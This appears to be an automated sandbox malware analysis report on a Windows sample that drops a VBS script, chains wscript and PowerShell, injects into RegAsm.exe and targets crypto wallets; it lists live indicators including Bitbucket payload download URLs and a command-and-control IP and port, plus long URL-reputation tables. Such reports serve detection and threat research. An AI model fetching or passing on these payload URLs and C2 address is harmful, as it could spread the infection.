                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Access Token Manipulation
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd211
                  Process Injection
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Behavior Graph (ID: 1519351, Sample: sRMytgfRpJ.exe, Startdate: 26/09/2024, Architecture: WINDOWS, Score: 100)
Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures. Contacted hosts: raw.githubusercontent.com, bitbucket.org, 3 other IPs or domains.
Process chain: sRMytgfRpJ.exe (dropped C:\Users\user\AppData\Local\Temp\...\fqt.vbs, ASCII) -> cmd.exe (also started conhost.exe) -> wscript.exe (Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found) -> powershell.exe (Suspicious powershell command line found; Found many strings related to Crypto-Wallets (likely being stolen); Suspicious execution chain found; Found suspicious powershell code related to unpacking or dynamic code loading; also started conhost.exe) -> powershell.exe (Installs new ROOT certificates; Writes to foreign memory regions; Injects a PE file into a foreign processes; Loading BitLocker PowerShell Module) -> RegAsm.exe (Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Installs new ROOT certificates; Found many strings related to Crypto-Wallets (likely being stolen); 3 other signatures)
Network: second powershell.exe -> raw.githubusercontent.com (185.199.109.133, port 443, source port 49730, FASTLYUS, Netherlands); bitbucket.org (185.166.143.49, port 443, source port 49735, AMAZON-02US, Germany); s3-w.us-east-1.amazonaws.com (52.216.210.153, port 443, source port 49738, AMAZON-02US, United States). RegAsm.exe -> 185.196.9.26 (port 6302, source port 49739, SIMPLECARRIERCH, Switzerland)

Source | Detection | Scanner | Label | Link
sRMytgfRpJ.exe | 13% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://api.ip.sb/ip | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary | 0% | Avira URL Cloud | safe |
http://tempuri.org/ | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id23ResponseD | 0% | Avira URL Cloud | safe |
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text | 0% | Avira URL Cloud | safe |
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id2Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id12Response | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2005/02/sc/sct | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id9 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id21Response | 0% | Avira URL Cloud | safe |
https://bitbucket.org/rulmerurk/ertertqw/downloads/wil25.txt | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id8 | 0% | Avira URL Cloud | safe |
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id5 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id4 | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id7 | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id19Response | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id6 | 0% | Avira URL Cloud | safe |
http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence | 0% | Avira URL Cloud | safe |
https://aui-cdn.atlassian.com/ | 0% | Avira URL Cloud | safe |
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/10/wsat | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id15Response | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew | 0% | Avira URL Cloud | safe |
https://bitbucket.org | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9 | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id6Response | 0% | Avira URL Cloud | safe |
https://aka.ms/winsvr-2022-pshelp | 0% | Avira URL Cloud | safe |
https://bbuseruploads.s3.amazonaws.com | 0% | Avira URL Cloud | safe |
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/04/sc | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id1ResponseD | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id9Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id21 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id22 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id20 | 0% | Avira URL Cloud | safe |
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1 | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id23 | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id24 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id24Response | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id1Response | 0% | Avira URL Cloud | safe |
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey | 0% | Avira URL Cloud | safe |
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC | 0% | Avira URL Cloud | safe |
https://raw.githubusercontent.com | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/08/addressing | 0% | Avira URL Cloud | safe |
https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735 | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/04/trust | 0% | Avira URL Cloud | safe |
https://cdn.cookielaw.org/ | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id12 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id10 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id11 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id16Response | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id13 | 0% | Avira URL Cloud | safe |
https://bbuseruploads.s3.amazonaws.com/4be491a4-012e-46db-bc28-27fee082b0f0/downloads/f4d27c97-7447- | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id15 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id17 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id14 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id16 | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id18 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id5Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id19 | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-w.us-east-1.amazonaws.com | 52.216.210.153 | true | false | | unknown
bitbucket.org | 185.166.143.49 | true | true | | unknown
raw.githubusercontent.com | 185.199.109.133 | true | true | | unknown
bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://bitbucket.org/rulmerurk/ertertqw/downloads/wil25.txt | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text | RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/sct | RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk | RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id23ResponseD | RegAsm.exe, 0000000A.00000002.2080065542.00000000033C2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary | RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/Entity/Id12Response | RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ | powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/ | RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/Entity/Id2Response | RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1 | RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/Entity/Id21Response | RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap | RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/Entity/Id9 | RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID | RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/Entity/Id8 | RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/Entity/Id5 | RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare | RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/Entity/Id4 | RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/Entity/Id7 | RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/Entity/Id6 | RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret | RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/Entity/Id19Response | RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license | RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp | false
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.2180041321.00000116A6042000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wsat/faultRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wsatRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://aui-cdn.atlassian.com/powershell.exe, 00000006.00000002.2009787604.00000116963CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id15ResponseRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2356536853.00000158A8C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.0000011695FD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://bitbucket.orgpowershell.exe, 00000006.00000002.2009787604.0000011699F8B000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id6ResponseRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000006.00000002.2009787604.000001169A162000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169AA9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169AAC0000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.ip.sb/ipRegAsm.exe, 0000000A.00000002.2070112434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://bbuseruploads.s3.amazonaws.compowershell.exe, 00000006.00000002.2009787604.0000011699F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.2009787604.000001169A162000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/04/scRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id1ResponseDRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://go.micropowershell.exe, 00000006.00000002.2009787604.000001169AE3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169BBE2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id9ResponseRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://contoso.com/Iconpowershell.exe, 00000006.00000002.2180041321.00000116A6042000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://tempuri.org/Entity/Id20RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id21RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id22RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id23RegAsm.exe, 0000000A.00000002.2080065542.00000000033B2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id24RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id24ResponseRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.ecosia.org/newtab/RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://tempuri.org/Entity/Id1ResponseRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735powershell.exe, 00000004.00000002.2356536853.00000158A912F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009259281.0000011694615000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009259281.0000011694600000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009259281.000001169468B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.0000011695FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009178942.00000116945F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169A611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009611502.00000116948E4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000033B2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2113417744.00000000058C2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressingRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://raw.githubusercontent.compowershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
